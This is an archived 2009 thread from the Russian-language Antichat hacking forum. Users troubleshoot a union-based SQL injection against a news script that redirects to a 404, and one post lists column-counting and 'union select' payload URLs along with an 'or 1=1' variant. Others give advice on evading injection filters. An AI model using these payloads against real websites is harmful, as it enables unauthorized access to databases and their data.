ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
12.04.2009, 08:16
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
2 Byrger
Если тока при ошибке, то недопускать ошибок =)
ордер баем по присутсвию редиректа вычисляешь кол-во полей, проверяешь, ставя union+select+кол-во полей--+ если редиректа нету, крутишь скулю дальше, ничего особенного  |
|
|
12.04.2009, 10:13
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от Iceangel_
2 Byrger
Если тока при ошибке, то недопускать ошибок =)
ордер баем по присутсвию редиректа вычисляешь кол-во полей, проверяешь, ставя union+select+кол-во полей--+ если редиректа нету, крутишь скулю дальше, ничего особенного Бывает, что редирект идет просто вне зависимости от правильности условия, в таком случае необходимо в настройках броузера убрать автомат перенаправления, могу привести пример...
|
|
|
|
12.04.2009, 10:41
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
А смотрите допустим я нашёл дырку
site.ru/news.php?id=1+union+select+1,2--
Теперь нам надо вывести мои 1,2
Но есть я делаю так
site.ru/news.php?id=1999+union+select+1,2--
или
site.ru/news.php?id=-1+union+select+1,2--
То идёт 404 
Как быть?
Это 100% редирект идёт так-как новость не найдена...а SQL-inj Есть
Последний раз редактировалось Byrger; 12.04.2009 в 10:48..
|
|
|
|
12.04.2009, 10:42
|
|
Banned
Регистрация: 11.10.2006
Сообщений: 682
Провел на форуме:
3750406
Репутация:
271
|
|
Теперь нам надо вывести смои 1,2
чиво???
|
|
|
|
12.04.2009, 10:49
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Сообщение от a1ex
чиво???
Чиво чиво
Ячейки 1 2 надо на экран вывести...
|
|
|
|
12.04.2009, 10:56
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Byrger ну че ты мозг колупашь всем? Тебе дали ответ уже во 2-ом посту сверху...
|
|
|
|
12.04.2009, 10:59
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Сообщение от DrAssault
Byrger ну че ты мозг колупашь всем? Тебе дали ответ уже во 2-ом посту сверху...
Дак идёт ридерект на 404 при нормальном запросе к бд! Вы читать то умеете?
Я изменяю id На несуществующий и возникает 404 а не в инъекции у меня ошибка!
|
|
|
|
12.04.2009, 11:09
|
|
Познающий
Регистрация: 11.02.2009
Сообщений: 98
Провел на форуме:
1446969
Репутация:
169
|
|
А ты уверен, что там 2 поля и именно такой комментарий работает?
|
|
|
|
12.04.2009, 11:46
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Сообщение от laedafess
А ты уверен, что там 2 поля и именно такой комментарий работает?
site.ru/news.php?id=1+group+by+10-- 404
site.ru/news.php?id=1+group+by+5-- 404
site.ru/news.php?id=1+group+by+3-- 404
site.ru/news.php?id=1+group+by+2-- ok
site.ru/news.php?id=1+union+select+1,2-- ok
site.ru/news.php?id=-1+union+select+1,2-- 404
site.ru/news.php?id=1999+union+select+1,2-- 404
site.ru/news.php?id=1999+or+1=1+union+select+1,2-- ok
Последний раз редактировалось Byrger; 12.04.2009 в 11:50..
|
|
|
|
12.04.2009, 11:13
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
2 Byrger
может стоять защита, от скулей, попробуй поэксперементировать со словами в инъекции
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид